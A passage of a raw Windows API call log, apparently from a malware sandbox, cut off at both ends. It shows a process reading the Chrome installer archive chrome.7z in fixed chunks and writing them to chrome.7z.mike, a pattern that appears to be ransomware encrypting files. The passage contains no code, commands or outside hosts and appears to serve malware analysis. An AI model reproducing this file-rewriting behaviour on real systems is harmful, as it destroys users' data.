0x1c8 [0178.323] GetFileType (hFile=0x1c8) returned 0x1 [0178.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.323] GetFileType (hFile=0x1c8) returned 0x1 [0178.324] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68505600, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4155000 [0178.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x2240ab0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2240ab0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.324] CloseHandle (hObject=0x1c8) returned 1 [0178.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.325] GetFileType (hFile=0x1c8) returned 0x1 [0178.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.325] GetFileType (hFile=0x1c8) returned 0x1 [0178.325] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4155220 [0178.325] WriteFile (in: hFile=0x1c8, lpBuffer=0x224b018*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x224b018*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.326] CloseHandle (hObject=0x1c8) returned 1 [0178.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.326] GetFileType (hFile=0x1c8) returned 0x1 [0178.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.326] GetFileType (hFile=0x1c8) returned 0x1 [0178.326] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68515840, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4157800 [0178.326] ReadFile (in: hFile=0x1c8, lpBuffer=0x224da98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x224da98*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.327] CloseHandle (hObject=0x1c8) returned 1 [0178.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.328] GetFileType (hFile=0x1c8) returned 0x1 [0178.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.328] GetFileType (hFile=0x1c8) returned 0x1 [0178.328] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4157a20 [0178.328] WriteFile (in: hFile=0x1c8, lpBuffer=0x2258000*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x2258000*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.328] CloseHandle (hObject=0x1c8) returned 1 [0178.329] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.329] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.329] GetFileType (hFile=0x1c8) returned 0x1 [0178.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.329] GetFileType (hFile=0x1c8) returned 0x1 [0178.329] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68526080, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x415a000 [0178.329] ReadFile (in: hFile=0x1c8, lpBuffer=0x225aa80, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x225aa80*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.330] CloseHandle (hObject=0x1c8) returned 1 [0178.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.331] GetFileType (hFile=0x1c8) returned 0x1 [0178.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.331] GetFileType (hFile=0x1c8) returned 0x1 [0178.331] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x415a220 [0178.331] WriteFile (in: hFile=0x1c8, lpBuffer=0x2264fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x2264fe8*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.331] CloseHandle (hObject=0x1c8) returned 1 [0178.331] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.331] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.331] GetFileType (hFile=0x1c8) returned 0x1 [0178.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.331] GetFileType (hFile=0x1c8) returned 0x1 [0178.332] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68536320, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x415c800 [0178.332] ReadFile (in: hFile=0x1c8, lpBuffer=0x2267a68, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2267a68*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.332] CloseHandle (hObject=0x1c8) returned 1 [0178.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.333] GetFileType (hFile=0x1c8) returned 0x1 [0178.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.333] GetFileType (hFile=0x1c8) returned 0x1 [0178.333] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x415ca20 [0178.333] WriteFile (in: hFile=0x1c8, lpBuffer=0x2271fd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x2271fd0*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.334] CloseHandle (hObject=0x1c8) returned 1 [0178.334] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.334] GetFileType (hFile=0x1c8) returned 0x1 [0178.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.334] GetFileType (hFile=0x1c8) returned 0x1 [0178.334] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68546560, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x415f000 [0178.334] ReadFile (in: hFile=0x1c8, lpBuffer=0x2274a50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2274a50*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.335] CloseHandle (hObject=0x1c8) returned 1 [0178.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.336] GetFileType (hFile=0x1c8) returned 0x1 [0178.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.336] GetFileType (hFile=0x1c8) returned 0x1 [0178.336] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x415f220 [0178.336] WriteFile (in: hFile=0x1c8, lpBuffer=0x227efb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x227efb8*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.336] CloseHandle (hObject=0x1c8) returned 1 [0178.336] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.337] GetFileType (hFile=0x1c8) returned 0x1 [0178.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.337] GetFileType (hFile=0x1c8) returned 0x1 [0178.337] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68556800, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4161800 [0178.337] ReadFile (in: hFile=0x1c8, lpBuffer=0x2281a38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2281a38*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.338] CloseHandle (hObject=0x1c8) returned 1 [0178.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.339] GetFileType (hFile=0x1c8) returned 0x1 [0178.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.339] GetFileType (hFile=0x1c8) returned 0x1 [0178.339] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4161a20 [0178.339] WriteFile (in: hFile=0x1c8, lpBuffer=0x228bfa0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x228bfa0*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.339] CloseHandle (hObject=0x1c8) returned 1 [0178.339] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.339] GetFileType (hFile=0x1c8) returned 0x1 [0178.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.340] GetFileType (hFile=0x1c8) returned 0x1 [0178.340] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68567040, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4164000 [0178.340] ReadFile (in: hFile=0x1c8, lpBuffer=0x228ea20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x228ea20*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.341] CloseHandle (hObject=0x1c8) returned 1 [0178.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.341] GetFileType (hFile=0x1c8) returned 0x1 [0178.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.341] GetFileType (hFile=0x1c8) returned 0x1 [0178.341] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4164220 [0178.342] WriteFile (in: hFile=0x1c8, lpBuffer=0x2298f88*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x2298f88*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.342] CloseHandle (hObject=0x1c8) returned 1 [0178.342] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.342] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.342] GetFileType (hFile=0x1c8) returned 0x1 [0178.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.342] GetFileType (hFile=0x1c8) returned 0x1 [0178.342] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68577280, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4166800 [0178.343] ReadFile (in: hFile=0x1c8, lpBuffer=0x229ba08, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x229ba08*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.343] CloseHandle (hObject=0x1c8) returned 1 [0178.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.344] GetFileType (hFile=0x1c8) returned 0x1 [0178.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.344] GetFileType (hFile=0x1c8) returned 0x1 [0178.344] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4166a20 [0178.344] WriteFile (in: hFile=0x1c8, lpBuffer=0x22a5f70*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x22a5f70*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.345] CloseHandle (hObject=0x1c8) returned 1 [0178.345] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.345] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.345] GetFileType (hFile=0x1c8) returned 0x1 [0178.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.345] GetFileType (hFile=0x1c8) returned 0x1 [0178.345] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68587520, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x4169000 [0178.345] ReadFile (in: hFile=0x1c8, lpBuffer=0x22a89f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x22a89f0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0178.346] CloseHandle (hObject=0x1c8) returned 1 [0178.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.347] GetFileType (hFile=0x1c8) returned 0x1 [0178.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.347] GetFileType (hFile=0x1c8) returned 0x1 [0178.347] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x4169220 [0178.347] WriteFile (in: hFile=0x1c8, lpBuffer=0x22b2f58*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x22b2f58*, lpNumberOfBytesWritten=0x2af244*=0x2800, lpOverlapped=0x0) returned 1 [0178.347] CloseHandle (hObject=0x1c8) returned 1 [0178.347] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0178.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0178.348] GetFileType (hFile=0x1c8) returned 0x1 [0178.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.348] GetFileType (hFile=0x1c8) returned 0x1 [0178.348] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=68597760, lpDistanceToMoveHigh=0x2af224*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af224*=0) returned 0x416b800 [0178.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af194) returned 1 [0178.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af190) returned 1 [0178.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0178.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1a0) returned 1 [0178.371] SetThreadErrorMode (dwNewMode=0x1, 